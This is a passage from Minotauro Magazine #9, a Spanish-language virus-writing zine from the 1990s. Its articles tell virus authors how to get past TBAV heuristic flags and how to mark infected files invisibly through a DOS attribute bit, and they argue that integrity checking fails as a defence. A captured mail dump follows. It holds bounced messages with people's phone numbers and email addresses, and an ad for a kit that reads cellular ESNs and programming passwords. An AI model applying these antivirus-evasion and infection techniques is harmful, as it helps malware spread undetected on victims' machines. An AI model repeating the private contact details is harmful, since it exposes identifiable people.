Calls Se activa al detectar llamadas no documentadas, como al tratar de desactivar el Vsafe... Generalmente no van a tener problemas con este flag ya que la mayoria de las veces la rutina se encuentra en la zona encriptada del virus, pero si este no estuviera encriptado se complica un poco el llamado a funciones no documentadas... ademas de la de usar el push mas adelante, les puede llegar a servir tambien esta otra: definir una variable con los datos a pasar y despues hacer un mov rr, word ptr cs:[variable] codigo original: VIRUS_START: MOV AX, 0FFFFh INT 21h [...] VIRUS_END: otra forma: VIRUS_START: MOV AX, WORD PTR [VARIABLE] INT 21h [...] VIRUS_END: DW VARIABLE 0FFFFh Tengan en cuenta que si la llamada la hacen fuera del rango de detecci¢n del PUSH IMMEDIATE (flag "1"), pueden hacer la llamada mediante el nunca bien ponderado PUSH VALOR, POP AX flag "O": Code Overwrite Este flag detecta el overwriting de codigo en memoria, como el hecho de reemplazar los primeros bytes en un COM para darle despues el salto a 100h... Lo que hay que hacer es ocultar la carga del registro DI o el que sea.. Generalmente esa parte del codigo esta atras, asi que lo mismo que antes, pushean y listo flag "X": Uses Stealth Salta por dos motivos: dir stealth y por SFTS Con ocultar la parte en que comparamos con 4eh, 4fh, 11h, 12h basta para la primer parte. La segunda salta con las llamadas a la int 2fh para encontrar el SFN apartir del handle y la SFT apartir del SFN. Basta con ocultar estos llamados. flag "F": Suspicious File Access Parece ahora que ademas de todo lo que hacia saltar esta alarma, se le agrega a la lista la actualizacion de fecha del file a infectar (ax = 5701h / int21h)... Basta con hacer lo que veniamos haciendo hasta ahora para eludirlo. Bueno, despues de todo no fue dificil... La cuestion es que en la practica no tendrian que llegar ni a necesitar estos trucos... La idea es que todas las partes del virus esten encriptadas en el archivo con lo que una buena rutina de encripcion bastaria para dejar de preocuparse por el TBAV en modo heuristico. Aunque SI hay que tener en cuenta como piensan los chabones, para adelantarnosles y no tener que modificar los virus mas viejos cada 2 x 3... Sobra decir que cada boludez que le agregan nos obliga a tener que agregar mas codigo y quitarle mas recursos a los sistemas infectados, asi que dejense de joder y empiecen a encriptar Un Saludo a toda la comunidad virosica, Drako, digital anarchy MINOTAURO MAGAZINE #9: Marca de infecci¢n por atributos Gusano, Los Alegres Colchoneros Seguramente toda su vida trataron de hacer una marca en los archivos infectados que sea f cil de verificar, como para hacer stealth y anti-heur¡stica, entonces por la primera condici¢n tenemos que descartar la posibilidad de que la marca este adentro del file, porque habr¡a que andar ley‚ndolo para verificar, y un dir si no hay ning£n cache cargado tardar¡a lo mismo que el windoze 95 en cargarse y no queremos que eso pase, entonces nos queda la info que guarda el DOS del file en cada entrada de directorio: Offset Tama¤o Descripci¢n 00h 8 BYTEs nombre 08h 3 BYTEs extenci¢n 0Bh BYTE atributos 0Ch 10 BYTEs reservado Usado por el DR-DOS para guardar el password. 16h WORD Hora 18h WORD Fecha 1Ah WORD Primer Cluster del file 1Ch DWORD Tama¤o del file Lo primero que vemos son esos 10 bytes en el offset 0Ch que si miramos un HD siempre est n en 00, ah¡ podemos escribir hasta "INFECTADO" y nadie se da cuenta a menos que lo mire con el disk edit, pero este valor no aparece en la DTA, as¡ que no es r pido como queremos. Si modificamos el siglo o los segundo de manera que el usuario no se de cuenta que cambiaron, saltan alarmas en todos los antivirus, as¡ que por ah¡ no viene la cosa, ni el nombre ni el tama¤o hay bytes al pedo as¡ que ah¡ no podemos tocar nada, as¡ que nos quedan los atributos. Los atributos son 1 Byte que el D.O.S almacena sobre cada archivo, y cada uno de sus bits, representa un tipo de atributo: Bit(s) Descripci¢n 7 shareable (Novell NetWare) 6 no usado 5 archivo 4 directorio 3 volume label execute-only (Novell NetWare) 2 system 1 hidden 0 read-only Seguramente en sus tablas de atributos el bit 7 tambi‚n esta como no usado, pero si Ralf dice que lo usa Novell, mejor no lo tocamos, pero nos queda el 6, con setearlo ya indicamos que el archivo esta infectado por nosotros. Esta manera de indicar es buena porque cuando leemos la DTA tenemos los atributos ah¡ sin ning£n esfuerzo. El £nico problema es setear este bit. La primera manera que se nos viene a la mente es con la int 021h, pero si activamos este bit, nos devuelve que estamos queriendo setear un atributo inv lido. Entonces nos quedan dos maneras de setearlo: 1) La primera y la mas normal seria a mano, ¢sea, buscar la entrada de directorio del file a infectar, leerla (hay que leer todo el sector) cambiarla y grabar todo el sector de nuevo. Esto seria bastante f cil, si no fuera porque para encontrar la entrada de directorio que queremos hay que hacer bastantes cosas como leer el registro de arranque, ver cuantos sectores por cluster tiene el disco, buscar la entrada '.' para saber donde empieza el dir, leer todos los sectores del dir donde esta el file hasta encontrarlo y reci‚n ah¡ modificarlo y escribirlo. 2) Esta es la manera mas f cil y funciona perfecto. V¡a SFT, solo hay que hay que hacer un OR OFFSET 04h de la SFT, 01000000b. Y cuando cerramos el archivo se guarda el cambio. No les voy a explicar como obtener las SFT porque ya esta muy bien explicado en la Minotauro 7 por Trurl. MINOTAURO MAGAZINE #9: M‚todos anti-virus WMA, digital anarchy Bueno, la idea de este art¡culo es alocada y hasta torpe. Pero lo que pretende es despertar un poco el intelecto asi que prosigamos... Como conocemos hay muchos metodos anti-virus, la mayor¡a como todos sabemos son basura, pero uno de los mejores es el chequeo de integridad. Primero, no necesita de cadenas de identificaci¢n, no esta sujeto a los errores a los que estas est n; segundo, no es un sistema heur¡stico que en s¡ es facil de burlar, no es un programa que sigue un algoritmo para buscar codigo com£n a los virii o cosa parecida, es mucho mas sencillo, y mas efectivo. Consiste simplemente en a partir de un archivo generar un codigo, o checksum, que bien puede ser hecho mediante CRC o simplemente ir sumando todos los bytes que conforman al archivo. Con esto, si el archivo cambia, al ser infectado la suma no dar  igual y estaremos alertas de la posible presencia de un virus. En casos como el tbav, donde ese checksum se guarda en un file, el sistema se torna engorroso, ya que hay un file con estos datos por cada directorio, lo que ocupa espacio, y ademas es f cilmente burlado por un virus, borrando simplemente ese file.., sin contar que cada nuevo file que entre a nuestra PC tendremos que validarlo sacando el checksum del mismo, o lo mismo cuando modifiquemos un file. Pero existe un sistema mejor que el guardar un file con el checksum, que es el de inmunizar el file. En qu‚ consiste esto?, pues en que el checksum vaya adentro del mismo programa. Lo que se hace es agregar un modulo (como si fuera un virus) que autochequee el archivo antes de ejecutar el mismo, y si este cambi¢, o su checksum no es el correcto, informa del caso y no corre el programa. Igualmente, a ese momento, el virus ya se habr  instalado en memoria, pero a£n as¡ queda el problema de que nos delata, pero eso es f cilmente burlado simplemente no infectando los files con ese modulo agregado, que son f ciles de reconocer. Tambi‚n esto hace aumentar el tama¤o del file ejecutable, y ademas esta sujeto a determinado tipos de ejecutables (x ejemplo no se le puede poner a un .exe con overlays). Podr¡a seguir explicando falencuias, pero no tengo ganas ;), en definitiva, tampoco sirve como metodo anti-virus... Igualmente este art¡culo es alocado e incentivador del intelecto, como lo mencion‚ al principo de la nota, asi que vayamos a por ello.. La idea es hacer un programa que se autogenere al ejecutarse, y que no pueda ser infectado. En c¢digo se traduce a algo mas o menos as¡..: ;====== Cut Here ============================================================== .Model tiny .Code org 100h begin: nop ; espacio para poder regenerarse nop nop mov ah,9 ; el programa en s¡ (cualquier cosa) lea dx,msg int 21h call regen ; me regenero. mov ax,4c00h ; salimos al DOS int 21h Regen: mov di,100h ; escribimos nuestros 3 bytes originales a lea si,RealJump ; nstro. comienzo, donde deber¡an estar. movsw movsb mov ax,3d02h ; nos abrimos... lea dx,MySelf int 21h mov bx,ax mov ah,40h ; nos copiamos desde memoria, la cantidad de mov dx,100h ; bytes q' ocupamos, asi nos desacemos del virii. mov cx,MySize int 21h mov ah,3Eh ; nos cerramos... int 21h ret ; listo, volvemos.. RealJump db 90h,90h,90h ; 3 bytes originales msg db 'Hi!, Soy Incontagiable!$' mySelf db 'GENIO.COM',0 MySize equ $ - offset begin ; nstro. tama¤o end begin ;====== Cut Here ============================================================== El problema de que el virus quedar¡a en memoria igual (esto suponiendo que todav¡a no lo est‚) sigo estando, pero veamos otras falencias.. Si el virus infecta antes de ejecutar el file el sistema funcionar¡a de maravilla (en el caso hipot‚tico de que TODOS los ejecutables del sistema tuvieran este modulo). El programa se correr¡a, el virus lo infectar¡a, pero al ejecutarse el file contagiado, este restaurar¡a sus 3 primeros bytes, y se copiar¡a a si mismo a disco (sin el virus) y quedar¡a intacto. Puede existir el problema de que el virus cambie mas que los 3 primeros bytes, pero esto se soluciona burdamente aumentando la cantidad de nops del file. Pero esto es f cilmete sorteado con honores :) por los virus que infectan despues de ejecutado el file, ya que el programa se regenerar¡a de la posible infecci¢n previa, pero al terminar ya estar¡a infectado nuevamente. Esto demuestra que estos sistemas en la pr ctica tampoco sirven, al igual que muchos otros, asi que resignense y reciban su pr¢xima infecci¢n con agrado. -- WM’ [DAN] -- P.D: se les estimul¢ o no el intelecto? ;), pueden seguir modificando el codigo que adjunto, o pensando mas sobre el tema, yo podr¡a seguir ampliando y especificando, pero se har¡a muy tedioso, asi que es su trabajo.. :) MINOTAURO MAGAZINE #9: Big Yuyo " Miraba fijo las imagenes que desfilaban frente a la pantalla. Pasaban con el mismo vertiginoso ritmo con que mi pulgar derecho oprimia el boton del control remoto. Cada una no duraba mas de algunas fracciones de segundo; era un bombardeo constante y agresivo de flashes. Estaba haciendo zapping. Vi una imagen que me llamo la atencion, y cuando quise detenerme ya me habia pasado dos o tres canales. Mientras volvia hacia atras pensaba '¨ El Subcomandante Marcos con Susana Gimenez ?'. Cuando llegue al canal preste atencion a la entrevista que alli ocurria, intentando entender que pasaba. Instantes despues todas mis esperanzas de ver al hombre que habia levantado a los indigenas contra el govierno en el norte de Mexico se esfumaron. Basto solo unas pocas palabras del entrevistado para que una gran decepcion se apoderara de mi. Ese tipo que hablaba con voz de misterio y cubria su rostro con un pasa monta¤as negro habia dicho: ' ... Soy Yuyo. Soy un Hacker ... '" J. Von Neumann Capture en Capture.Txt -------------------------------------------- Envio de mensajes fuera de linea MP OnLine! v2.2 - Offline reader 1.1 Mensajes de MP/correo/leidos -------------------------------------------- Mens.: 30 De : un1.satlink.com!satlink!MAILER-DAEMON A : yuyo Tema : Subject: Returned mail Fecha: 17/08/1995 13:48:10 Para: yuyo From un1.satlink.com!satlink!MAILER-DAEMON Mon Aug 14 21:51:40 1995 remote from uunet Received: from un1.satlink.com by relay2.UU.NET with SMTP id QQzcvf20948; Mon, 14 Aug 1995 21:51:40 -0400 Received: from satlink.UUCP (Usatlink@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id WAA16009 for mponline.com.ar!yuyo; Mon, 14 Aug 1995 22:59:43 -0400 Received: by satlink.net with uucp (FX UUCP) for mponline.com.ar!yuyo; Mon, 14 Aug 95 22:07:02 -0400 Message-ID: Date: Mon, 14 Aug 95 22:07:02 -0400 From: uunet!satlink.net!MAILER-DAEMON To: uunet!mponline.com.ar!yuyo Subject: Returned mail ----- Transcript of session follows ----- The host ubik.satlink.net is unknown. Please contact info@satlink.net ----- Unsent message follows ----- From mponline.com.ar!yuyo Mon Aug 14 17:23:26 1995 Received: from relay3.UU.NET by hustle.rahul.net with SMTP id AA23261 (5.67b8/IDA-1.5 for ); Mon, 14 Aug 1995 17:23:26 -0700 Received: from uucp2.UU.NET by relay3.UU.NET with SMTP id QQzcuz07494; Mon, 14 Aug 1995 20:23:24 -0400 From: yuyo@mponline.com.ar Message-Id: Received: from mponline.UUCP by uucp2.UU.NET with UUCP/RMAIL ; Mon, 14 Aug 1995 20:23:27 -0400 To: fernando@ubik.satlink.net Subject: Date: Thu Aug 10 22:14:21 rio 1995 regrese de c.d. Uruguay. necesito copias de los video cassete inluyendo el de la policia. ponete en contacto con migo. si podes llama a julio lopez (el que filma el corto sobre hackers) despues de las 22.30hs al 259-6757. #*** Siguiente mensaje ***# Mens.: 31 De : un1.satlink.com!satlink!MAILER-DAEMON A : yuyo Tema : Subject: Returned mail Fecha: 17/08/1995 13:48:11 Para: yuyo From un1.satlink.com!satlink!MAILER-DAEMON Mon Aug 14 21:51:46 1995 remote from uunet Received: from un1.satlink.com by relay2.UU.NET with SMTP id QQzcvf20955; Mon, 14 Aug 1995 21:51:46 -0400 Received: from satlink.UUCP (Usatlink@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id WAA16008 for mponline.com.ar!yuyo; Mon, 14 Aug 1995 22:59:39 -0400 Received: by satlink.net with uucp (FX UUCP) for mponline.com.ar!yuyo; Mon, 14 Aug 95 22:06:59 -0400 Message-ID: Date: Mon, 14 Aug 95 22:06:59 -0400 From: uunet!satlink.net!MAILER-DAEMON To: uunet!mponline.com.ar!yuyo Subject: Returned mail ----- Transcript of session follows ----- The host ubik.satlink.net is unknown. Please contact info@satlink.net ----- Unsent message follows ----- From mponline.com.ar!yuyo Mon Aug 14 17:23:06 1995 Received: from relay3.UU.NET by hustle.rahul.net with SMTP id AA23248 (5.67b8/IDA-1.5 for ); Mon, 14 Aug 1995 17:23:06 -0700 Received: from uucp2.UU.NET by relay3.UU.NET with SMTP id QQzcuz07409; Mon, 14 Aug 1995 20:23:03 -0400 From: yuyo@mponline.com.ar Message-Id: Received: from mponline.UUCP by uucp2.UU.NET with UUCP/RMAIL ; Mon, 14 Aug 1995 20:23:06 -0400 To: fernando@ubik.satlink.net Subject: mensaje yuyo] Date: Thu Aug 10 00:23:19 rio 1995 regrese de c. d. uruguay. necesito copias de los video cassete inculuyendo el de la policia. ponete en contacto con migo. si podes llama a julio lopez (el que filma el corto sobre hackers) depues de las 22:30hs al 259-6757. #*** Siguiente mensaje ***# Mens.: 32 De : nw.com!nw A : yuyo Tema : Subject: Re: Interface Fecha: 17/08/1995 13:48:35 Para: yuyo From nw.com!nw Tue Aug 15 06:15:50 1995 remote from uunet Received: from nw.com by relay2.UU.NET with SMTP id QQzcwn14301; Tue, 15 Aug 1995 06:15:50 -0400 Received: from localhost (nw@localhost) by nw.com (8.6.5/8.6.5) id DAA25594 for yuyo@mponline.com.ar; Tue, 15 Aug 1995 03:16:20 -0700 Date: Tue, 15 Aug 95 3:16:20 PDT From: Network Wizards To: uunet!mponline.com.ar!yuyo Subject: Re: Interface In-Reply-To: Your message of Wed Aug 09 10:31:55 rio 1995 Message-ID: Cellular Telephone Experimentors Kit for the OKI-900/1150 The Cellular Telephone Experimentors Kit allows control of a cellular telephone from a personal computer. The Kit connects any DOS-based PC with a serial port to an OKI-900/1150 (AT&T 3730/3760) cellular telephone. The kit is designed for technicians, students, professionals, hobbyists, and others interested in using, learning, repairing, and experimenting with cellular telephone technology. The kit consists of an interface adapter, software and manual. The interface adapter converts the cellular phone's proprietary interface to a standard RS-232 interface, and allows connection of external audio signals to the cellular phone. The interface is not designed for data transmission over the cellular system. The kit includes the cellular telephone interface adapter; a manual and a short cellular tutorial; four programs; a programming library and documentation; and cellular related informational files. One program is designed for testing the phone and allows a technician to activate many of the OKIs built in test modes and functions, such as tuning to a particular channel, activating carrier, sat, signalling tones, etc. Another program can be used to access the phone's user features, such as programming NAMs, or uploading, downloading and editing the phone's 200 alphanumeric telephone number memories on the PC. A programming library object module is supplied to allow you to write your own programs to access the phone in both normal operating mode and in test mode. The library contains functions such as tuning to a channel, turning carrier/audio/sat-tones/signalling-tones on and off, reading received signal strength, sending and receiving digital control messages, and sending and decoding dtmf tones. Two programs are supplied in source form that give examples of writing applications in either of these modes. One of these programs shows how the PC can completely control the cellular phone, making and receiving calls while the phone is only operating in its test mode, with the PC handling all of the cellular protocol and messaging functions. The other program simply controls the phone by simulating presses on its keypad from the PC. All code and libraries were compiled using Borland Turbo C 2.0 running under DOS. We are not supporting any other systems at this time. The software does not change or modify ESNs. OTHER CELLULAR PHONES AND PRODUCTS We do not support any other brand of cellular telephones. We also do consulting and special projects with OKI related cellular equipment. ORDERING INFORMATION ITEM DESCRIPTION PRICE ============================================================================= CTEK Cellular Telephone Experimentors Kit interface $100 requires an adapter cable listed below CTC900 adapter cable for OKI-900 (AT&T 3730) $25 CTC1150 adapter cable for OKI-1150 (AT&T 3760) $25 CTS2T SMA to TNC adapter for OKI-900 $5 allows connecting standard cellular mobile antennas to OKI-900 (female SMA - female TNC) CTRANT right angle antenna (with TNC connector) $20 when used with CT-S2T adapter, allows OKI-900 to sit flat on table with vertical antenna PAYMENT Payment can be made by personal check (must clear first), money order or cashiers check, or company purchase order. Add $4 for shipping. Californian's must pay 8.25 ales tax. CONTACT US AT Network Wizards PO Box 343 Menlo Park, CA 94026 tel: (415) 326-2060 fax: (415) 326-4672 net: info@nw.com ---------------------------------------------------------------------- Cellular Telephone Experimentors Kit Contents of Floppy Disk Information Files README This file. MANUAL The manual. Read it. TUTORIAL.DOC A cellular telephone tutorial. AREACODE.DOC A listing of North American area codes. SYSTEMS.DOC A listing of North American cellular telephone systems. NW.DOC Contact information for Network Wizards Programs MENU.EXE A menu driven program for setting user parameters in the phone. TEST.EXE A program for cellular telephone testing and maintenance. KEYCON.EXE,C A program (and source) to control the OKI in normal mode. TEL.EXE,C A program (and source) to control the OKI in test mode. Programming Libraries CTLIB.DOC The cellular telephone programming library documentation. CTLIB.H The cellular telephone programming library header file. CTLIB.OBJ The cellular telephone programming library object module. TTY.OBJ Serial I/O object module (1of2). TTYA.OBJ Serial I/O object module (2of2). MAKEFILE A Turbo C makefile for compiling the sample source code. ---------------------------------------------------------------------- PROGRAMMING LIBRARY FUNCTION SUMMARY INITIALIZATION ct_lib_init initialize library routines ct_lib_done cleanup after library routines ct_on turn phone on ct_off turn phone off OPERATION ct_keypress "press" a key on phone TRANSMISSION ct_set_channel select channel number ct_set_carrier turn transmitter on or off ct_set_tx_power set transmit power level ct_set_sat select sat tones AUDIO ct_set_audio_path set source/destination of audio signals ct_set_rx_audio mute or unmute received audio ct_set_tx_audio mute or unmute transmitted audio ct_set_volume set audio volume level ct_set_audio_tone select audio alerting tones ct_set_dtmf transmit DTMF tones ct_dtmf_decode receive DTMF tones ct_set_comp_exp turn compressor/expandor circuit on or off DATA AND SIGNALLING ct_fcc_msg receive a Forward Control Channel message ct_fvc_msg receive a Forward Voice Channel message ct_rcc_msg send a Reverse Control Channel message ct_rvc_msg send a Reverse Voice Channel message ct_set_signalling_tone turn signalling tone on or off ct_stream set reception on even or odd data stream STATUS ct_get_rss read received signal strength ct_get_battery_level read battery level MEMORIES ct_read_mem read telephones internal memory ct_read_block read memory block from phone ct_set_block write memory block to phone ct_get_esn read ESN from phone ct_get_romver read ROM version number from phone ct_get_prog_pwd read programming password from phone ct_get_cust_msg read custom power on message from phone ct_set_cust_msg write custom power on message to phone ct_get_nams read NAMs out of phone UTILITIES ct_inc_channel increment to next channel ct_dec_channel decrement to next channel ct_channel_type return type of channel ct_decode_fcc_msg decode a forward control channel message ct_decode_fvc_msg decode a forward voice channel message ct_decode_order decode a received order ct_tel2min convert a telephone number to a MIN ct_gen_bch generate a BCH error correction code ------------------------------------------------------------------------- #*** Siguiente mensaje ***# Mens.: 34 De : MAILER-DAEMON A : yuyo Tema : Subject: Returned mail: too many hops 19 (17 max): from satlink!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!mponline.com.ar!yuyo via localhost, 6ýÿernando@ubik.satlink.net Fecha: 19/08/1995 07:17:02 Para: yuyo From MAILER-DAEMON Fri Aug 18 19:54:21 1995 remote from uunet Received: from un1.satlink.com by relay1.UU.NET with SMTP id QQzdjr19261; Fri, 18 Aug 1995 19:54:21 -0400 Received: from localhost (localhost) by un1.satlink.com (8.6.11/8.6.11) with internal id VAB31743; Fri, 18 Aug 1995 21:01:28 -0400 Date: Fri, 18 Aug 1995 21:01:28 -0400 From: Mail Delivery Subsystem Subject: Returned mail: too many hops 19 (17 max): from satlink!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!mponline.com.ar!yuyo via localhost, to fernando@ubik.satlink.net Message-Id: <199508190101.VAB31743@un1.satlink.com> To: uunet!un1.satlink.com!satlink!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!mponline.com.ar!yuyo MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="VAB31743.808794088/un1.satlink.com" This is a MIME-encapsulated message --VAB31743.808794088/un1.satlink.com The original message was received at Fri, 18 Aug 1995 21:01:25 -0400 from Usatlink@localhost ----- Transcript of session follows ----- 554 too many hops 19 (17 max): from satlink!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!mponline.com.ar!yuyo via localhost, to fernando@ubik.satlink.net ----- Original message follows ----- --VAB31743.808794088/un1.satlink.com Content-Type: message/rfc822 Return-Path: satlink!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!mponline.com.ar!yuyo Received: from satlink.UUCP (Usatlink@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id VAA31743 for fernando@ubik.satlink.net; Fri, 18 Aug 1995 21:01:25 -0400 Received: by satlink.net with uucp (FX UUCP) for fernando@ubik.satlink.net; Fri, 18 Aug 95 19:49:09 -0400 Received: from satlink.UUCP (Usatlink@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id TAA30282 for fernando@ubik.satlink.net; Fri, 18 Aug 1995 19:03:32 -0400 Received: by satlink.net with uucp (FX UUCP) for fernando@ubik.satlink.net; Fri, 18 Aug 95 18:47:50 -0400 Received: from satlink.UUCP (Usatlink@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id SAA29507 for fernando@ubik.satlink.net; Fri, 18 Aug 1995 18:02:42 -0400 Received: by satlink.net with uucp (FX UUCP) for fernando@ubik.satlink.net; Fri, 18 Aug 95 16:47:45 -0400 Received: from satlink.UUCP (Usatlink@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id QAA28285 for fernando@ubik.satlink.net; Fri, 18 Aug 1995 16:04:00 -0400 Received: by satlink.net with uucp (FX UUCP) for fernando@ubik.satlink.net; Fri, 18 Aug 95 15:48:08 -0400 Received: from satlink.UUCP (Usatlink@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id OAA27586 for fernando@ubik.satlink.net; Fri, 18 Aug 1995 14:16:16 -0400 Received: by satlink.net with uucp (FX UUCP) for fernando@ubik.satlink.net; Fri, 18 Aug 95 14:00:10 -0400 Received: from satlink.UUCP (Usatlink@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id NAA27307 for fernando@ubik.satlink.net; Fri, 18 Aug 1995 13:27:48 -0400 Received: by satlink.net with uucp (FX UUCP) for fernando@ubik.satlink.net; Fri, 18 Aug 95 12:47:12 -0400 Received: from satlink.UUCP (Usatlink@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id MAA26510 for fernando@ubik.satlink.net; Fri, 18 Aug 1995 12:00:42 -0400 Received: by satlink.net with uucp (FX UUCP) for fernando@ubik.satlink.net; Fri, 18 Aug 95 10:47:08 -0400 Received: from satlink.UUCP (Usatlink@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id KAA25939 for fernando@ubik.satlink.net; Fri, 18 Aug 1995 10:01:42 -0400 From: satlink!mponline.com.ar!yuyo@un1.satlink.com Received: by satlink.net with uucp (FX UUCP) for fernando@ubik.satlink.net; Fri, 18 Aug 95 08:04:54 -0400 Received: from relay3.UU.NET by hustle.rahul.net with SMTP id AA20473 (5.67b8/IDA-1.5 for ); Fri, 18 Aug 1995 03:23:15 -0700 Received: from uucp6.UU.NET by relay3.UU.NET with SMTP id QQzdhp22359; Fri, 18 Aug 1995 06:23:14 -0400 Message-Id: Received: from mponline.UUCP by uucp6.UU.NET with UUCP/RMAIL ; Fri, 18 Aug 1995 06:23:14 -0400 To: fernando@ubik.satlink.net Subject: persona Date: Thu Aug 17 14:56:25 rio 1995 Atento Fernando, favor contactar via telefonica 54-1-9626761. espero te haya ido bien en el medico. saludos. yuyo. --VAB31743.808794088/un1.satlink.com-- #*** Siguiente mensaje ***# Mens.: 35 De : MAILER-DAEMON A : yuyo Tema : Subject: Returned mail: too many hops 19 (17 max): from satlink!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!mponline.com.ar!yuyo via localhost, 6ýÿernando@ubik.satlink.net Fecha: 20/08/1995 07:03:06 Para: yuyo From MAILER-DAEMON Sat Aug 19 21:50:05 1995 remote from uunet Received: from un1.satlink.com by relay2.UU.NET with SMTP id QQzdnr09197; Sat, 19 Aug 1995 21:50:05 -0400 Received: from localhost (localhost) by un1.satlink.com (8.6.11/8.6.11) with internal id XAB09510; Sat, 19 Aug 1995 23:00:30 -0400 Date: Sat, 19 Aug 1995 23:00:30 -0400 From: Mail Delivery Subsystem Subject: Returned mail: too many hops 19 (17 max): from satlink!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!mponline.com.ar!yuyo via localhost, to fernando@ubik.satlink.net Message-Id: <199508200300.XAB09510@un1.satlink.com> To: uunet!un1.satlink.com!satlink!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!mponline.com.ar!yuyo MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="XAB09510.808887630/un1.satlink.com" This is a MIME-encapsulated message --XAB09510.808887630/un1.satlink.com The original message was received at Sat, 19 Aug 1995 23:00:29 -0400 from Usatlink@localhost ----- Transcript of session follows ----- 554 too many hops 19 (17 max): from satlink!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!mponline.com.ar!yuyo via localhost, to fernando@ubik.satlink.net ----- Original message follows ----- --XAB09510.808887630/un1.satlink.com Content-Type: message/rfc822 Return-Path: satlink!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!un1.satlink.com!mponline.com.ar!yuyo Received: from satlink.UUCP (Usatlink@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id XAA09510 for fernando@ubik.satlink.net; Sat, 19 Aug 1995 23:00:29 -0400 Received: by satlink.net with uucp (FX UUCP) for fernando@ubik.satlink.net; Sat, 19 Aug 95 21:49:49 -0400 Received: from satlink.UUCP (Usatlink@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id VAA08416 for fernando@ubik.satlink.net; Sat, 19 Aug 1995 21:01:00 -0400 Received: by satlink.net with uucp (FX UUCP) for fernando@ubik.satlink.net; Sat, 19 Aug 95 19:52:10 -0400 Received: from satlink.UUCP (Usatlink@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id TAA07035 for fernando@ubik.satlink.net; Sat, 19 Aug 1995 19:00:18 -0400 Received: by satlink.net with uucp (FX UUCP) for fernando@ubik.satlink.net; Sat, 19 Aug 95 17:48:23 -0400 Received: from satlink.UUCP (Usatlink@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id RAA06321 for fernando@ubik.satlink.net; Sat, 19 Aug 1995 17:16:23 -0400 Received: by satlink.net with uucp (FX UUCP) for fernando@ubik.satlink.net; Sat, 19 Aug 95 16:52:23 -0400 Received: from satlink.UUCP (Usatlink@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id QAA05647 for fernando@ubik.satlink.net; Sat, 19 Aug 1995 16:15:10 -0400 Received: by satlink.net with uucp (FX UUCP) for fernando@ubik.satlink.net; Sat, 19 Aug 95 15:49:35 -0400 Received: from satlink.UUCP (Usatlink@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id OAA04903 for fernando@ubik.satlink.net; Sat, 19 Aug 1995 14:25:35 -0400 Received: by satlink.net with uucp (FX UUCP) for fernando@ubik.satlink.net; Sat, 19 Aug 95 13:46:22 -0400 Received: from satlink.UUCP (Usatlink@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id NAA04609 for fernando@ubik.satlink.net; Sat, 19 Aug 1995 13:01:19 -0400 Received: by satlink.net with uucp (FX UUCP) for fernando@ubik.satlink.net; Sat, 19 Aug 95 12:25:16 -0400 Received: from satlink.UUCP (Usatlink@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id MAA04181 for fernando@ubik.satlink.net; Sat, 19 Aug 1995 12:01:07 -0400 From: satlink!mponline.com.ar!yuyo@un1.satlink.com Received: by satlink.net with uucp (FX UUCP) for fernando@ubik.satlink.net; Sat, 19 Aug 95 11:09:03 -0400 Received: from relay3.UU.NET by hustle.rahul.net with SMTP id AA16045 (5.67b8/IDA-1.5 for ); Sat, 19 Aug 1995 06:09:06 -0700 Received: from uucp4.UU.NET by relay3.UU.NET with SMTP id QQzdlh15764; Sat, 19 Aug 1995 06:21:44 -0400 Message-Id: Received: from mponline.UUCP by uucp4.UU.NET with UUCP/RMAIL ; Sat, 19 Aug 1995 06:21:37 -0400 To: fernando@ubik.satlink.net Subject: Reenvio. Date: Fri Aug 18 16:39:08 rio 1995 regrese de C.D uruguay. necesito consigas los videos de Hadad y Longo. Tengo par a vos el video de uilmes, 2:10 hs de grabacion. te recuerdo, miercoles 23 salimo s en programa Macro a las 22:00. Grabalo. YUYO. --XAB09510.808887630/un1.satlink.com-- #*** Siguiente mensaje ***# Mens.: 36 De : elmalo A : yuyo Tema : hola! Fecha: 28/08/1995 18:16:11 mira si sos yuyp hacker te pido me des una mano, ya que yo se bastante poco de hack y phreak, serias tan amable de pasarme lo que tengas de hack?? en el correo o en mi BBS o en el foro hobbies si sos tan amable.... POR FAVOOOOOOOOOOOOOOOOR!!! chau y gracias por adelantado #*** Siguiente mensaje ***# Mens.: 37 De : walfav A : yuyo Tema : Varios Fecha: 29/08/1995 09:33:58 Favor: necesito reunirme con vos por motivos varios, uno es la posibilidad de re alizar una charla 